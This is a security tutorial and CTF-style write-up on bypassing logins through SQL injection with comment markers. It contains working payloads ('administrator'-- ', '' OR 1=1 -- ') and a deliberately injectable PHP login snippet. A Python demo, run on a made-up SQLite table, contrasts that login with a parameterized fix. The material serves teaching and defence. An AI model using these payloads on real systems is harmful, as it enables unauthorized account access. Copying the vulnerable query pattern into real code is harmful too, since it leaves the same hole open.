Authentication By-Pass

Introduction

Authentication bypass via SQL injection is a technique in which an attacker manipulates the login query of a web application to gain access without valid credentials. By injecting SQL syntax into the login fields, in particular a comment marker that truncates the query, the attacker cuts the password check out of the statement so the application accepts the login.

How to identify

To identify vulnerabilities that allow authentication bypass via SQL injection using comments, pay attention to how the application handles user inputs in login forms. Indicators include:

  1. Login Page: Login forms are a good candidate for authentication bypass because the username and password are often concatenated directly into the query without proper escaping or parameterization.

  2. Error Messages: Look for SQL syntax errors when inputting certain characters like single quotes ('). An error that mentions SQL syntax is a strong sign that the input reaches the query unescaped.

  3. Behavior Testing: Enter typical SQL injection patterns to see if the application responds abnormally, such as logging in without correct credentials. Example:

     Username: ' OR 1=1 --
     Password: [any_password]

  4. Code Analysis: Check the backend code for direct use of user inputs in SQL queries without proper sanitization or parameter binding.

Here is an example of a vulnerable PHP code snippet ($conn is an existing mysqli connection):

<?php
// Raw request values, used without escaping or parameter binding
$username = $_POST['username'];
$password = $_POST['password'];
// The input is concatenated straight into the SQL string, so a single quote
// in $username ends the string literal and everything after it is parsed as SQL
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysqli_query($conn, $query);
// Any matching row counts as a successful login
if(mysqli_num_rows($result) > 0) {
    // Login successful
} else {
    // Login failed
}
?>

Code/tools/websites

Tools

  • SQLMap: An automated tool for SQL injection and database takeover.

  • Burp Suite: A web vulnerability scanner with tools for manual testing.

  • Havij: An automated SQL injection tool.

Websites

https://web.ctflearn.com/web4/ (Easy)

https://ctf.hackthebox.com/

Sample problem

Problem Statement

You are given access to a web application with a login form that has a username field and a password field.

Identify if the application is vulnerable to SQL injection authentication bypass and log in without valid credentials.

Link to lab

Solution

You can manipulate the SQL query so that the password check is never evaluated, or so that the WHERE clause always evaluates to true.

  • Manipulating the Username Input: Instead of providing a valid username, input administrator'-- (with a trailing space after the --). This works as follows:

    • We use the username administrator and close the string literal with '.

    • The -- starts a comment that runs to the end of the line, so everything after it, including the password check, is ignored by the database.

  • Resulting SQL Query: In the backend, when combined with the original query, it would look like this:

    SELECT * FROM `users` WHERE `username` = 'administrator'-- ' AND `password` = '';
  • The database only evaluates `username` = 'administrator', so it returns the administrator's row regardless of what was typed in the password field. The application sees a matching row, treats the login as successful, and the authentication check is bypassed.

Note that MySQL only treats -- as a comment when it is followed by a whitespace character, so against MySQL the payload must be administrator'-- (with the space) or administrator'# ; SQLite and PostgreSQL also accept a bare --. A different approach is ' OR 1=1 -- , which makes the WHERE clause true for every row and typically logs you in as the first user in the table.

This technique leverages the fact that the database interprets certain character sequences as SQL rather than as data: -- comments out the rest of the line, and OR 1=1 creates a condition that always evaluates to true.
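The following script is an added example, not code from the original page or the lab it describes. It reproduces the identification steps and the solution against a constructed in-memory SQLite table that stands in for the application's MySQL `users` table: a vulnerable login that concatenates input like the PHP snippet, the same login written with a parameterized query, and a probe that shows the single-quote syntax error. The usernames, passwords and table layout are made up for the demo; the trailing space after -- is kept so the payloads would also work against MySQL.

```python
import sqlite3

# Constructed sample data, standing in for the application's `users` table.
# Plaintext passwords are used only to mirror the vulnerable PHP snippet;
# a real application stores salted password hashes.
SAMPLE_USERS = [
    ("administrator", "correct-horse-battery"),
    ("alice", "alice-pw"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Mirror of the vulnerable PHP code: raw input is pasted into the SQL
    string, so a quote ends the literal and whatever follows is parsed as SQL.
    Returns the usernames of all matching rows; non-empty means 'logged in'."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return sorted(row[0] for row in conn.execute(query).fetchall())


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterized version: the driver binds the values, so quotes and
    comment markers in the input are just characters, never SQL."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return sorted(row[0] for row in rows)


def single_quote_breaks_query(conn: sqlite3.Connection) -> bool:
    """Identification step 2: a lone quote in the username leaves an
    unterminated string literal, which the database rejects as a syntax error."""
    try:
        vulnerable_login(conn, "'", "x")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Comment payload: the password check is cut off, only the admin row matches
    print(vulnerable_login(db, "administrator'-- ", "wrong"))   # ['administrator']
    # Tautology payload: every row matches, so the app logs in as "someone"
    print(vulnerable_login(db, "' OR 1=1 -- ", "wrong"))        # ['administrator', 'alice']
    # Same payload against the parameterized query: no user has that literal name
    print(safe_login(db, "administrator'-- ", "wrong"))         # []
    print(single_quote_breaks_query(db))                        # True
```

The difference between the two login functions is the whole fix: in the parameterized version the database receives the statement and the values separately, so `administrator'-- ` is compared, quote and dashes included, against the username column and simply finds no row.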

Conclusion

Authentication bypass using SQL injection comments is a common attack vector that exploits user input concatenated directly into SQL queries. Mitigating it means using parameterized (prepared) queries so that input is bound as data rather than spliced into the statement; input validation is a useful additional layer but not a substitute.
